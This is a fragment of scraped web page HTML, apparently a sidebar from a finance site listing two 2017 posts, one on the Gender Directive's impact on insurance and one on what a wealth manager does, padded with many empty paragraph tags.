</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<div class=\"image\">&#13;\r\n									<a href=\"../g-day-impact-gender-directive-insurance/\">&#13;\r\n										<img width=\"52\" height=\"21\" src=\"../wp-content/uploads/2012/09/headline-image-composite-preview.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"headline-image-composite-preview\"/></a>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n																</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div class=\"post-holder\"><p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n									<a href=\"../g-day-impact-gender-directive-insurance/\">G-day – Impact of the Gender Directive on Insurance</a>&#13;\r\n									</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div class=\"meta\">&#13;\r\n										September 18th, 2017									</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n							</li>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n														</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<div class=\"image\">&#13;\r\n									<a href=\"../what-does-a-wealth-managerdo/\">&#13;\r\n																			</a>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n																</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div class=\"post-holder\"><p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n									<a href=\"../what-does-a-wealth-managerdo/\">What Does a Wealth Manager Do?</a>&#13;\r\n									</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div class=\"meta\">&#13;\r\n										September 5th, 2017									</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n							</li>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n													</ul>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p